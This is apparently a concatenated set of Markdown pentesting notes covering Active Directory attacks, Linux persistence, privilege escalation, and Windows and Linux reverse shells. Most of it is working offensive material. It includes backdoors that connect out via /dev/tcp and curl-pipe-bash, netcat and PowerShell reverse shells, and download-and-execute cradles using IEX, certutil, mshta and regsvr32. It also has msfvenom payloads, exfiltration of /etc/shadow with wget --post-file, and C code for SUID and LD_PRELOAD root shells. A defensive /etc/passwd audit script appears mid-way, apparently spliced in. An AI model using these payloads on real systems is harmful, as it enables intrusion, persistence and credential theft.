Get-NetGroup -UserName "USERNAME"
Get-NetGroup -GroupName "GROUPNAME" -FullData
```

## Enumerating computers and shares

```powershell
Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer -OperatingSystem "*windows 10*"
Get-NetComputer -OperatingSystem "*server 2019*"
Invoke-ShareFinder
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
```

## Enumerating misc.

```powershell
Get-NetDomain
Get-NetGPO
Get-ObjectACL
```
--------------------------------------------------------------------------------
/Pentesting Active Directory/Active Directory.md:
--------------------------------------------------------------------------------
# Impacket installation

## Introduction

So you're likely here if you've had issues with Impacket. Impacket is moderately frustrating to say the least... A lot of people have issues with it, so let's walk through the Impacket install process!

## Installing Impacket

First, you'll want to clone the repo with:

```
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
```

This will clone Impacket to /opt/impacket/. After the repo is cloned, you will notice several install-related files, including requirements.txt and setup.py. Setup.py is commonly skipped during the installation. It's key that you DO NOT miss it.

So let's install the requirements:

```
pip3 install -r /opt/impacket/requirements.txt
```

Once all the python modules are installed, we can then run the python setup install script:

```
cd /opt/impacket/ && python3 ./setup.py install
```

After that, Impacket should be correctly installed and ready to use!

# Kerbrute

## Installation
Clone the repository.

```
git clone https://github.com/ropnop/kerbrute.git /opt/kerbrute
cd /opt/kerbrute
```

With the repository cloned, you can also use the Makefile to compile for common architectures:

```
make help
make all
```

Your new binaries will be inside the `dist` directory.

## Usage

Enumerating users:

```
./kerbrute_linux_386 userenum --dc -d
```

# ASREPRoasting

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASREPRoasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos ticket for the specified user account.

## Exploitation

Impacket has a tool called "GetNPUsers.py" (located in Impacket/Examples/GetNPUsers.py) that will allow us to query ASREPRoastable accounts from the Key Distribution Center. The only thing that's necessary to query accounts is a valid set of usernames, which we enumerated previously via Kerbrute.

```
python3 GetNPUsers.py / -dc-ip -usersfile
```

Then crack the dumped hashes.

```
hashcat -m 18200
```

# secretsdump.py

For this command to work you will also need to know the user's password.

```
secretsdump.py -dc-ip @
```

When successful, this will dump the domain users' NTLM hashes.
--------------------------------------------------------------------------------
/Pentesting Active Directory/Breaching Active Directory.md:
--------------------------------------------------------------------------------
https://tryhackme.com/room/breachingad

## Getting AD credentials:
- NTLM Authenticated Services
- LDAP Bind Credentials
- Authentication Relays
- Microsoft Deployment Toolkit
- Configuration Files

## OSINT and Phishing
OSINT: https://tryhackme.com/room/redteamrecon
Phishing: https://tryhackme.com/module/phishing

## NTLM Authenticated Services
hydra -L usernames.txt -p Changeme123 http-get://ntlmauth.za.tryhackme.com

## LDAP Bind Credentials (LDAP Pass-back Attack)
Tricking a service into authenticating to our LDAP server (port 389).
https://www.digitalreplica.org/articles/openldap-for-ldap-plain-text-password-capture/

## Authentication Relays
sudo responder -I INTERFACE

## Microsoft Deployment Toolkit
PXE Boot Image Retrieval
```powershell
tftp -i IP GET "\tmp\BCDFILE" conf.bcd
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile
tftp -i IP GET "IMAGE_LOCATION" pxeboot.wim
Get-FindCredentials -WimFile pxeboot.wim
```

## Configuration Files
https://github.com/GhostPack/Seatbelt
--------------------------------------------------------------------------------
/Pentesting Linux Hosts/Linux Persistence Backdoors.md:
--------------------------------------------------------------------------------
# Linux persistence/backdoors

## SSH backdoor

Generate a new keypair.

```bash
ssh-keygen
```

Add your public key to `authorized_keys` on the target machine.

```bash
chmod 600 id_rsa
ssh -i id_rsa USER@RHOST
```

## PHP backdoors

Webroot usual location: `/var/www/html`

```php
" . shell_exec($_REQUEST['yz']) . "";
}
?>
```

## Cron jobs

Cron jobs are located in: `/etc/crontab`

```
* * * * * root curl http://RHOST/shell.php | bash
```

```bash
#!/bin/bash

bash -i >& /dev/tcp/LHOST/LPORT 0>&1
```

## bashrc backdoor

Waiting for the user to log in.

```bash
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc
```

## More...

[airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c](https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c)
--------------------------------------------------------------------------------
/Pentesting Linux Hosts/Linux Post-Exploitation.md:
--------------------------------------------------------------------------------
git clone https://github.com/melnicek/peh

https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

cp /bin/bash /tmp/yz
chmod +s /tmp/yz
/tmp/yz -p

ssh -L LPORT:RHOST:RPORT USER@RHOST -fN

for i in {1..254}; do (ping -c 1 x.x.x.${i} | grep "bytes from" &); done; sleep 2; arp -en | grep -v incomplete
for i in {1..65535}; do (echo > /dev/tcp/x.x.x.x/$i) >/dev/null 2>&1 && echo $i is open; done

sudo tcpdump -D
sudo tcpdump -i INTERFACE
sudo tcpdump -i INTERFACE -e
sudo tcpdump -i INTERFACE -X
sudo tcpdump -i INTERFACE host HOST
sudo tcpdump -i INTERFACE src host HOST
sudo tcpdump -i INTERFACE tcp src port PORT

for i in {1..254}; do (ping -c 1 10.200.101.${i} | grep "bytes from" &); done; sleep 2; arp -en | grep -v incomplete
--------------------------------------------------------------------------------
/Pentesting Linux Hosts/Linux Privilege Escalation.md:
--------------------------------------------------------------------------------
# Spawning root shell

## Rootbash

In this method we create a copy of the bash binary as root and set the SUID bit on it, resulting in a bash executable that always runs in the context of the root user.

```text
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash
```

After creating the copy, we can run it from an unprivileged terminal (`-p` makes bash keep the effective UID instead of dropping it).

```text
/tmp/rootbash -p
```

## Executable

We create a simple C program which sets the UID to 0 and runs `/bin/bash`. When compiled with root privileges, we can run it afterwards as a permanent root backdoor.

```c
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    system("/bin/bash");
    return 0;
}
```

Compile it with root privileges.

```text
gcc -o
```

## Msfvenom executable

Create a msfvenom reverse shell, then execute it as root with a handler prepared on your attack machine.

```text
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell
```

## Native reverse shells

This method needs more research.

```text
https://github.com/mthbernardes/rsg
```
# Manual enumeration

## System enumeration

```text
hostname

# enumerate os version
uname -a
cat /etc/issue
cat /proc/version
cat /etc/*-release

# enumerate number of cores
lscpu

# enumerate running services
ps aux

# enumerate installed packages
dpkg -l
```

## User enumeration

```text
# whoami
whoami
id

# what can I run as an admin
sudo -l

# enumerate users
cat /etc/passwd
cat /etc/passwd | cut -d : -f 1
cat /etc/passwd | grep "sh$"

# enumerate groups
cat /etc/group
```

## Network enumeration

```text
# enumerate network interfaces
ip a
ifconfig

# enumerate routing table
ip route
routel

# enumerate arp table
ip neigh
arp -a

# enumerate open ports and connected clients
netstat -ano
netstat -anp
ss -anp
cat /etc/iptables
```

## Hunting for interesting files

```text
# enumerate by file contents (errors for unreadable paths go to /dev/null)
grep -rnw '/' -ie "password" --color=always 2>/dev/null
grep -rnw '/' -ie "pass" --color=always 2>/dev/null
grep -rnw '/' -ie "pwd" --color=always 2>/dev/null

# enumerate by file name
locate password | more
locate pass | more
locate pwd | more

# search for ssh keys
find / -name id_rsa 2>/dev/null
```

# Automated tools

### [https://github.com/rebootuser/LinEnum \(linenum.sh\)](https://github.com/rebootuser/LinEnum)

### [https://github.com/diego-treitos/linux-smart-enumeration \(lse.sh\)](https://github.com/diego-treitos/linux-smart-enumeration)

### [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite \(linpeas.sh\)](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)

[https://github.com/Anon-Exploiter/SUID3NUM \(suid3num.py\)](https://github.com/Anon-Exploiter/SUID3NUM)

[https://github.com/mzet-/linux-exploit-suggester \(les.sh\)](https://github.com/mzet-/linux-exploit-suggester)

[https://github.com/sleventyeleven/linuxprivchecker \(linuxprivchecker.py\)](https://github.com/sleventyeleven/linuxprivchecker)

[https://github.com/AlessandroZ/BeRoot \(beroot.py\)](https://github.com/AlessandroZ/BeRoot)

[http://pentestmonkey.net/tools/audit/unix-privesc-check \(unix-privesc-check\)](http://pentestmonkey.net/tools/audit/unix-privesc-check)

## First 6 scripts can be downloaded by using this bash script

```bash
#!/bin/bash
wget "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh" -O linenum.sh
chmod 700 linenum.sh
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
chmod 700 lse.sh
wget "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh" -O linpeas.sh
chmod 700 linpeas.sh
wget "https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py" -O suid3num.py
chmod 700 suid3num.py
wget "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh" -O les.sh
chmod 700 les.sh
wget "https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py" -O linuxprivchecker.py
chmod 700 linuxprivchecker.py
ifconfig
echo "sudo python3 -m http.server 80"
```

# Techniques

## Kernel exploits

Enumerate the kernel version:

```text
uname -a
cat /etc/issue
```

Then use searchsploit / linux-exploit-suggester / google to find matching exploits:

```text
searchsploit linux kernel priv esc

# or you can use https://github.com/jondonas/linux-exploit-suggester-2
./linux-exploit-suggester-2.pl -k
```

## Service exploits

First, enumerate processes running as root.

```text
ps aux | grep "^root"
netstat -nl
```

Then enumerate their versions.

```text
-v
--version
dpkg -l | grep
rpm -qa | grep
```

Search for exploits matching the enumerated software versions.

## Stored secrets / weak file permissions

Always search through history files.

```text
history
cat ~/.bash_history
cat ~/*_history
```

Also search for files containing "password", "pass", "pwd".

```text
find .
-type f -exec grep -i -I "PASSWORD" {} /dev/null \; 222 | ``` 223 | 224 | Don't overlook possible interesting files and directories with bad permissions. 225 | 226 | ```text 227 | # Find all writable files in /etc: 228 | find /etc -maxdepth 1 -writable -type f 229 | 230 | # Find all readable files in /etc: 231 | find /etc -maxdepth 1 -readable -type f 232 | 233 | # Find all directories which can be written to: 234 | find / -executable -writable -type d 2> /dev/null 235 | ``` 236 | 237 | ### /etc/shadow \(default: -rw-r--r--\) 238 | 239 | Things you can do: 240 | 241 | 1. If a file is readable, you can try to crack root hash. 242 | 2. If a file is writable, you can replace original hash. 243 | 244 | You can generate new sha-512 \("$6$"\) hash of a password with this command. 245 | 246 | ```text 247 | mkpasswd -m sha-512 248 | ``` 249 | 250 | ### /etc/passwd \(default: -rw-------\) 251 | 252 | Things you can do when the file is writable: 253 | 254 | 1. Deleting `x` , can disable password on older systems. 255 | 2. Replacing `x` with a new password hash generated by `openssl passwd ""` . 256 | 3. Append new user with UID 0, but different username. 257 | 258 | ### SSH keys \(id\_rsa / authorized\_keys\) 259 | 260 | ```text 261 | find / -name authorized_keys 2>/dev/null 262 | find / -name id_rsa 2>/dev/null 263 | ``` 264 | 265 | ### Backups 266 | 267 | Look for interesting files, also backups can be found in these locations. 268 | 269 | ```text 270 | ls -la / 271 | ls -la /tmp 272 | ls -la /var/backups 273 | ``` 274 | 275 | ## Sudo misconfigurations 276 | 277 | Sudo is used to run programs as an another user, by default it's root. 278 | 279 | ```text 280 | sudo -u 281 | ``` 282 | 283 | You can list programs which can be run without requiring password. 

```text
sudo -l
```

Some ways to escalate privileges with unrestricted sudo:

```text
sudo -s
sudo -i
sudo /bin/bash
sudo passwd
```

Shell escape sequences can be found here: [https://gtfobins.github.io/](https://gtfobins.github.io/)

### "Intended functionality"

Some programs' intended functionality can also help you to escalate privileges. Always google for possible privilege escalations using programs you have access to.

#### apache2 example

When you run apache2 as root, you can provide a configuration file with the `-f` flag. When the file is not in the correct format, apache2 prints the first line of the file in its error message. We can use this to read the first line of `/etc/shadow` (root's hash) and crack it.

```text
sudo apache2 -f /etc/shadow
```

#### wget example

The wget command can not only download files, but also post files to a webserver.

You can set up a netcat listener on your machine; running this command on the target machine then sends `/etc/shadow` your way.

```text
sudo wget --post-file=/etc/shadow LHOST:LPORT
```

### LD_PRELOAD

When the LD_PRELOAD environment variable is set and you run an executable, the dynamic linker loads the specified library (running its initialisation code) before it executes the original program.

First we create the source code file for a shared object.

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init(){
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p");
}
```

Then compile this C code as a shared object.

```text
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
```

Preload this shared object when you run an executable you have permission to run with sudo.

```text
sudo LD_PRELOAD=/path/to/shell.so PROGRAM
```

### CVE-2019-14287

If your user is allowed to run some executable as any user except root, like this:

```text
user ALL=(ALL,!root) /bin/bash
```

With ALL specified, the user can run the binary `/bin/bash` as any user (not only the root user; other user IDs work too).

```text
sudo -u#-1 /bin/bash
```

### CVE-2019-18634

When `pwfeedback` is set in specific versions of sudo (<1.8.25p), we can trigger a stack-based buffer overflow. Exploiting the bug does not require sudo permissions, merely that `pwfeedback` be enabled.

```text
Matching Defaults entries for user on linux-build:
    insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail

User user may run the following commands on linux-build:
    (ALL : ALL) ALL
```

The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password.

```text
wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c -O exploit.c
gcc -o exploit exploit.c
./exploit
```

## SUID / SGID files

You can list SUID executables with this command.

```text
find / -perm -4000 -type f -exec ls --color=auto -l {} \; 2>/dev/null
```

Check for easy wins: [https://gtfobins.github.io/](https://gtfobins.github.io/)

This script is great: [https://github.com/Anon-Exploiter/SUID3NUM](https://github.com/Anon-Exploiter/SUID3NUM)

```text
wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py
```

```text
# Running strace against a command:
strace -v -f -e execve PROGRAM 2>&1 | grep exec

# Running ltrace against a command:
ltrace PROGRAM
```

### Shared object injection

Sometimes executables use third-party shared objects, which we are able to hijack to run our own code with the permissions of the original executable.

You can run `strings` on SUID executables, then look for shared object paths.

`strace` can also show the objects used by the executable.

```text
strace PROGRAM 2>&1
strace PROGRAM 2>&1 | grep -i -E "open|access|no such file"
```

```c
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject(){
    system("cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p");
}
```

Compile the shared object with gcc.

```text
gcc -shared -fPIC -o OUTPUT.so shared_object.c
```

### Binary symlinks

[https://packetstormsecurity.com/files/139750/Nginx-Root-Privilege-Escalation.html](https://packetstormsecurity.com/files/139750/Nginx-Root-Privilege-Escalation.html)

### Environment variables (PATH)

Find anything related to environment variables (PATH, etc.).

```text
strings EXECUTABLE
```

When you find an executable called without its full path, create your own with the same name.

```c
#include <stdlib.h>
#include <unistd.h>

int main(){
    setgid(0);
    setuid(0);
    system("cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p");
    return 0;
}
```

Then compile it.

```text
gcc executable.c -o executable
```

And prepend your working directory to the path.

```text
export PATH=/tmp:$PATH
```

### Malicious bash functions

Find out if the executable runs any bash commands.

```text
strings EXECUTABLE
```

When you find one, create a bash function with the same name.

```text
function /command/you/found() { cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p; }
export -f /command/you/found
```

Run the original executable again. Now it will run your bash function instead of the original command.

## Capabilities

Kernel 2.2 and higher.

```text
getcap -r / 2>/dev/null
```

You are looking for `+ep`, like this.

```text
/usr/bin/python2.6 = cap_setuid+ep
```

And then: [https://gtfobins.github.io/#+capabilities](https://gtfobins.github.io/#+capabilities)

```text
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

## Cron jobs

Crons can be enumerated with:

```text
cat /etc/crontab
```

They are also located in these directories.

```text
/var/spool/cron/
/var/spool/cron/crontabs/
```

The crontab PATH environment variable is by default set to `/usr/bin:/bin`.

### Cron paths

A writable directory in the cron PATH + a job that calls a command by relative path = win.

### Wildcards (*)

When a cron job runs something like:

```text
cd /home/user
tar czf /tmp/backup.tar.gz *
```

Then you can:

```text
echo "cp /bin/bash /tmp/yz && chmod +s /tmp/yz" > malicious.sh
chmod +x malicious.sh
touch ./--checkpoint=1
touch ./--checkpoint-action=exec=sh\ malicious.sh
```

## NFS root squashing

Check for `no_root_squash`.

```text
cat /etc/exports
```

Then you can list mountable folders from your attacker machine.

```text
showmount -e RHOST
```

And mount one of them.

```text
mkdir /tmp/MOUNTPOINT
mount -o rw,vers=2 RHOST:/SHARE /tmp/MOUNTPOINT
```

Create a .c file inside your newly mounted folder.

```c
#include <stdlib.h>
#include <unistd.h>

int main(){
    setgid(0);
    setuid(0);
    system("cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p");
    return 0;
}
```

Compile it and set the SUID bit on.

```text
gcc malicious.c -o malicious
chmod +s malicious
```

Finally, run it from the target machine.

## Docker

If you are a member of the `docker` group, you can easily escalate to root.

```text
docker run -v /:/tmp -i -t bash bash
```

# Privilege escalation

## Situational awareness

```text
id
cat /etc/passwd
hostname
cat /etc/issue
cat /etc/*-release
uname -a
ps aux
ip a
ifconfig
route
routel
netstat -anp
ss -anp
cat /etc/iptables
ls -lah /etc/cron*
dpkg -l

# page 528 for more
```

## Spawning root shell

### Rootbash

```text
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash
/tmp/rootbash -p
```

### Executable

Create a bash wrapper in C.

```c
#include <stdlib.h>
#include <unistd.h>

int main(){
    setuid(0);
    system("/bin/bash");
    return 0;
}
```

Then compile it as root.

```text
gcc -o OUTPUT SOURCE.c
```

### Msfvenom executable

Create an msfvenom payload, then execute it as root.

```text
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell
```

### Native reverse shells

```text
https://github.com/mthbernardes/rsg
```

## Enumeration tools

```text
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/rebootuser/LinEnum
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
https://github.com/sleventyeleven/linuxprivchecker
https://github.com/AlessandroZ/BeRoot
http://pentestmonkey.net/tools/audit/unix-privesc-check
```

## Techniques

### Kernel exploits

Enumerate the kernel version:

```text
uname -a
cat /etc/issue
```

Use searchsploit to find matching exploits:

```text
searchsploit linux kernel priv esc

# or you can use https://github.com/jondonas/linux-exploit-suggester-2
./linux-exploit-suggester-2.pl -k
```

### Service exploits

Show processes running as root:

```text
ps aux | grep "^root"
netstat -nl
```

Enumerate program versions:

```text
PROGRAM -v
PROGRAM --version
dpkg -l | grep PROGRAM
rpm -qa | grep PROGRAM
```

Search for exploits.

### Weak file permissions

```text
# Find all writable files in /etc:
find /etc -maxdepth 1 -writable -type f

# Find all readable files in /etc:
find /etc -maxdepth 1 -readable -type f

# Find all directories which can be written to:
find / -executable -writable -type d 2> /dev/null
```

#### /etc/shadow

1. Crack the root hash.
2. Replace the original hash with a new one:

```text
mkpasswd -m sha-512
```

#### /etc/passwd

1. Delete the `x`; works on older systems.
2. Replace the `x` with a new password hash generated by `openssl passwd ""`.
3. Append a new user with UID 0, but a different username.
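As a defensive counterpart to the /etc/shadow and /etc/passwd items above, here is an added audit script (not part of these notes) that parses passwd-format data and flags exactly those tampering patterns, plus unsafe file modes on both files. The entries and the hash string in `SAMPLE_PASSWD` are constructed for the demonstration; `audit_live()` runs the same checks against the real files.

```python
"""Defensive audit for the /etc/passwd and /etc/shadow tampering patterns
listed above: extra UID 0 accounts, emptied password fields, password hashes
placed directly in passwd, and unsafe file modes.

Added example, not from these notes. The sample entries and the hash string
in SAMPLE_PASSWD are constructed for the demonstration.
"""
import os
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    severity: str   # "high" or "medium"
    line_no: int    # 1-based line in the passwd data; 0 for file-level findings
    message: str


# Constructed sample: the last two entries show the tampering patterns.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
svc::1001:1001::/home/svc:/bin/bash
toor:$6$constructed$notARealHashJustAPlaceholder:0:0:root:/root:/bin/bash
"""


def audit_passwd(text):
    """Return Findings for passwd-format text (7 colon-separated fields per line)."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding("medium", n, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append(Finding("medium", n, f"{name}: non-numeric UID {uid!r}"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append(Finding("high", n, f"{name}: additional UID 0 account"))
        if pw == "":
            findings.append(Finding("high", n, f"{name}: empty password field"))
        elif pw != "x" and not pw.startswith(("*", "!")):
            # Anything other than the shadow marker 'x' or a locked marker is a
            # hash stored directly in passwd (e.g. output of openssl passwd).
            findings.append(Finding("high", n, f"{name}: password hash stored in passwd"))
    return findings


def audit_mode(kind, mode):
    """Flag unsafe permission bits; kind is 'passwd' or 'shadow', mode is st_mode."""
    findings = []
    perm = stat.S_IMODE(mode)
    if perm & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(Finding("high", 0, f"/etc/{kind} writable by group or others ({perm:o})"))
    if kind == "shadow" and perm & stat.S_IROTH:
        findings.append(Finding("high", 0, f"/etc/shadow readable by others ({perm:o})"))
    return findings


def audit_live(passwd_path="/etc/passwd", shadow_path="/etc/shadow"):
    """Run both checks against the real files (stat on shadow needs no root)."""
    with open(passwd_path, encoding="utf-8") as fh:
        findings = audit_passwd(fh.read())
    findings += audit_mode("passwd", os.stat(passwd_path).st_mode)
    findings += audit_mode("shadow", os.stat(shadow_path).st_mode)
    return findings


if __name__ == "__main__":
    # Demo on the constructed sample plus a deliberately world-readable shadow mode.
    for f in audit_passwd(SAMPLE_PASSWD) + audit_mode("shadow", 0o100644):
        print(f"[{f.severity}] line {f.line_no}: {f.message}")
```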

### Backups

Look for interesting files:

```text
ls -la /
ls -la /tmp
ls -la /var/backups
```

### Sudo

```text
# Run a program using sudo:
sudo PROGRAM

# Run a program as a specific user:
sudo -u USER PROGRAM

# List programs a user is allowed (and disallowed) to run:
sudo -l
```

Other ways to escalate privileges with sudo:

```text
sudo -s
sudo -i
sudo /bin/bash
sudo passwd
```

Shell escape sequences for more programs can be found here:

```text
https://gtfobins.github.io/
```

### Cron jobs

Located in:

```text
/var/spool/cron/
/var/spool/cron/crontabs/
/etc/crontab
```

The crontab PATH environment variable is by default set to `/usr/bin:/bin`.

### SUID / SGID files

```text
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
```

```text
https://github.com/Anon-Exploiter/SUID3NUM
```

```text
# Running strings against a file:
strings FILE

# Running strace against a command:
strace -v -f -e execve PROGRAM 2>&1 | grep exec

# Running ltrace against a command:
ltrace PROGRAM
```

## Privesc strategy

Spend some time and read over the results of your enumeration.

If Linux Smart Enumeration level 0 or 1 finds something interesting, make a note of it. Create a checklist of things you need for the privilege escalation method to work.

Have a quick look around for files in your user's home directory and other common locations (e.g. /var/backup, /var/logs). If your user has a history file, read it; it may have important information like commands or even passwords.

Try things that don't have many steps first, e.g. sudo, cron jobs, SUID files.

Have a good look at root processes, enumerate their versions and search for exploits.

Check for internal ports that you might be able to forward to your attacking machine.

If you still don't have root, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren't familiar with, an "unusual" filesystem configured (on Linux, anything that isn't ext, swap, or tmpfs), or even a username.

At this stage you can also start to think about kernel exploits.

--------------------------------------------------------------------------------
/Pentesting Linux Hosts/Linux Reverse Shells.md:
--------------------------------------------------------------------------------

```bash
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
rm /tmp/y;mkfifo /tmp/y;cat /tmp/y|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/y
rm /tmp/y;mkfifo /tmp/y;cat /tmp/y|/bin/sh -i 2>&1|telnet LHOST LPORT >/tmp/y
nc -e /bin/sh LHOST LPORT
nc -c /bin/sh LHOST LPORT
```

Normalization of a shell.

```bash
SHELL=/bin/bash script -q /dev/null
[Ctrl + Z]
stty raw -echo
fg
reset
xterm
```

--------------------------------------------------------------------------------
/Pentesting Windows Hosts/Windows Code Execution to Shell.md:
--------------------------------------------------------------------------------
# Create reverse shell from code execution on Windows machine

First, you create a reverse shell executable with msfvenom.

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o rev.exe
```

Then you'll host your executable with some http server (in this example I'll use python's http.server).

```
sudo python3 -m http.server 80
```

Now you can set up your listener (multi/handler or a normal netcat listener).

And lastly, from the target Windows machine you'll execute certutil.

```
cmd.exe /C certutil -urlcache -split -f http://LHOST/rev.exe rev.exe
```

For more: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

## powershell.exe

```powershell
$client = New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

```powershell
$client = New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

```bash
# serve shell.ps1
python3 -m http.server

# execute on target
powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://LHOST/shell.ps1\");"
```

### Creating encoded powershell commands on linux

```bash
echo -n "IEX (New-Object Net.WebClient).downloadstring('URL')" | iconv --to-code UTF-16LE | base64 -w 0
```

## mshta.exe

Runs .hta (HTML Application) files.

```bash
# first, we generate hta-psh file with msfvenom
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f hta-psh -o FILE.hta

# then we start server
python3 -m http.server

# and run command on target host
mshta.exe http://LHOST:PORT/FILE.hta
```

```text
use exploit/windows/misc/hta_server

mshta.exe http://LHOST/FILE.hta
```

## rundll32.exe

```text
# first, we generate dll file with msfvenom
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f dll -o FILE.dll

# serve the file through smb
sudo python3 ../smbserver.py -smb2support -user USER -password PASS SHARE `pwd`

# execute on target
rundll32.exe \\LHOST\SHARE\FILE.dll,0
```

```text
use exploit/windows/smb/smb_delivery

rundll32.exe \\LHOST\SHARE\FILE.dll,0
```

## regsvr32.exe

```text
use exploit/multi/script/web_delivery

regsvr32 /s /n /u /i:http://LHOST:PORT/FILE.sct scrobj.dll
```

## certutil.exe

```text
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f exe > shell.exe

# host generated file
python3 -m http.server 80

# start listener (exploit/multi/handler)

certutil.exe -urlcache -split -f http://LHOST/shell.exe shell.exe & shell.exe
```

## powershell.exe (with powercat)

```text
git clone https://github.com/besimorhino/powercat.git
python -m SimpleHTTPServer 80

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e cmd"
```

## more ...

```text
https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
```

--------------------------------------------------------------------------------
/Pentesting Windows Hosts/Windows Post-Exploitation.md:
--------------------------------------------------------------------------------
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

# PowerShell Open Port Discovery
```powershell
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("IP",$_)) "Port $_ is open!"} 2>$null
```

# PowerShell in-memory Download and Execute cradle
```powershell
iex (iwr 'URL')

iex (New-Object Net.WebClient).DownloadString('URL')

$down = [System.NET.WebRequest]::Create("URL")
$read = $down.GetResponse()
IEX ([System.IO.StreamReader]($read.GetResponseStream())).ReadToEnd()

$file=New-Object -ComObject Msxml2.XMLHTTP;$file.open('GET','URL',$false);
$file.send();
iex $file.responseText

$ie=New-Object -ComObject InternetExplorer.Application;
$ie.visible=$False;
$ie.navigate('URL');
sleep 4;
$response=$ie.Document.body.innerHTML;
$ie.quit();
iex $response
```

certutil.exe -urlcache -f URL OUTFILE
certutil.exe -urlcache -split -f URL OUTFILE
certutil.exe -decode IN.TXT OUT.exe

xfreerdp /u:USER /p:PASS /cert:ignore /v:RHOST

cmdkey /list
vaultcmd /list
vaultcmd /listcreds:"VAULT"
runas /user:USER /savecred EXECUTABLE

powershell -ep bypass

. .\PowerView.ps1
Get-NetUser | select cn
Get-NetGroup -GroupName *admin*
Get-NetShare
Invoke-ShareFinder
Get-NetComputers
Get-NetComputer -fulldata | select operatingsystem
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

. .\Downloads\SharpHound.ps1
